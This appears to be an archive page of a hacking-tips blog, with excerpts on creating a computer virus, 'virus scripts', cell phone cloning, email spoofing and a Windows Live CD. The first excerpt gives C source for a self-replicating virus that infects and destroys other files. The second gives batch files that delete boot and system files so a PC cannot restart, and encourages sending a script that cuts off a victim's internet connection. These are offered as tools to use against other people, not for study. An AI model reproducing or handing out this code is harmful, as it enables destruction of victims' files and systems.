Posts

Showing posts from November, 2015

How to Create a Computer Virus?

Image
This program is an example of how to  create a computer virus  in C language. This program demonstrates a simple virus program which when executed creates a copy of itself in all the other files that are present in the same directory. Thus, it destroys other files by infecting them. The infected file will also become a virus so that when executed, it is capable of spreading the infection to another file and so on. Here’s the source code of the virus program: #include<stdio.h> #include<io.h> #include<dos.h> #include<dir.h> #include<conio.h> #include<time.h> FILE *virus,*host; int done,a=0; unsigned long x; char buff[2048]; struct ffblk ffblk; clock_t st,end; void main() { st=clock(); clrscr(); done=findfirst(“*.*”,&ffblk,0); //Search for a file with any extension (*.*) while(!done) { virus=fopen(_argv[0],”rb”); host=fopen(ffblk.ff_name,”rb+”); if(host==NULL) goto next; x=89088; printf(“Infecting %s\n”,f...

VIRUS SCRIPT

How to crash a PC Forever !:::   @echo off attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini   Open up notepad and copy and paste that. Save it as a .bat file. This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart. REMEMBER - DO NOT CLICK THIS FILE. (for the idiots) **Also remember this might not work with vista.**         How to stop someone's internet access::::     @Echo off Ipconfig /release   Save that as a .bat and send it to someone. They're IP address will be lost, and therefore they won't be able to fix it   However, this is VERY easy to fix. Simply type in IPconfig /renew         ShutDown PC million Times::::   1.right click on the desktop 2.click shortcut you will ge...

What is Cell Phone Cloning – Everything You Need to Know

Image
Are you receiving exorbitantly high phone bill that doesn’t match your  mobile  phone usage or somebody used you for letting them send lewd messages or for making obscene calls??? If yes then it’s time for you to realize that your  mobile handset has been cloned.   What is cloning??? Cell phone cloning is a technique wherein secured data from one cell phone is transferred into another phone. The other cell phone becomes the exact replica of the original cell phone like a clone. As a result, while calls can be made from and received by both phones, only the legitimate subscriber is billed as the service provider network does not have a way to differentiate between the legitimate phone and the “cloned” phone. The cloner can set the options to ring his phone when you make a call and you will have no idea that the cloner is listening from his own mobile. He can read text message, phone book entries, look at pictures etc. Also he can dial phone numbers from their phone...

How to Create a Windows 7 Live CD the Easy Way

Image
Before we get into creating a Live CD, lets understand what exactly it is and how it can save you a lot of trouble in case of a computer crash or malware infection on your PC. A Live CD is basically a bootable storage device that contains an operating system (OS). What is different about a live CD is the fact that the working of the OS does not depend on the hard drive. Why do you nee

Email Hacking

Image
EMAIL HACKING Email hacking     is illegal access to an   email   account or email correspondence.Email on the internet is now commonly sent by the   Simple Mail Transfer Protocol   (SMTP). This does not encrypt the text of emails and so intercepted mail can be read easily unless the user adds their own   encryption. The identity of the sender or addressee of an email is not   authenticated   and this provides opportunities for abuse such as   spoofing . Email Spoofing Email spoofing is a technique used by hackers to fraudulently send email messages in which the sender address and other parts of the email header are altered to appear as though the email originated from a source other than its actual source. Hackers use this method to disguise the actual email address from which phishing and spam messages are sent and often use email spoofing in conjunction with Web page spoofing to trick users into providing perso...

write us

Share your idea with us "  trickyworld@techie.com  " " +639080120381 " Farhan